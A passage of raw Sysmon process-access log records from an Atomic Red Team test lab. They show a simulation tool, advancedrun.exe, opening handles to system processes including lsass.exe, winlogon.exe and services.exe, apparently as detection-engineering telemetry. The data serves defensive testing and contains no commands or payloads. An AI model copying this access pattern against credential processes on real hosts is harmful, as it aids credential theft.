Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983791Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.334{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1100-000000002702}488C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983790Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.334{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DB00-61EA-7F00-000000002702}4768C:\Program 
Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983788Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.334{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-1000-000000002702}92C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003983787Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.334{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-6100-000000002702}4392C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorWindow Manager\DWM-2 10341000x80000000000000003983786Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.334{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE7-61EA-0F00-000000002702}364C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983785Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.334{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5C00-000000002702}4148C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983784Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.334{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5B00-000000002702}4100C:\Windows\system32\csrss.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983783Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.334{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE6-61EA-0E00-000000002702}932C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000003983782Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.334{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE6-61EA-0D00-000000002702}876C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983781Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.334{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF8-61EA-5500-000000002702}4052C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983780Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.334{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0C00-000000002702}652C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983779Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 17:59:08.334{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF7-61EA-5300-000000002702}3936C:\Program 
Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983778Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.334{834264DD-F46C-61EA-8204-000000002702}22203244C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAE4-61EA-0A00-000000002702}628C:\Windows\system32\services.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab6d|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983777Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.334{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF6-61EA-4300-000000002702}3824C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983776Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
17:59:08.334{834264DD-F46C-61EA-8104-000000002702}24645148C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe{834264DD-DAF5-61EA-3F00-000000002702}3552C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+ab4b|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+21a1|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2320|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2590|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2fdf|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+2069|C:\AtomicRedTeam\atomics\T1588.002\bin\AdvancedRun\advancedrun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000003983775Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
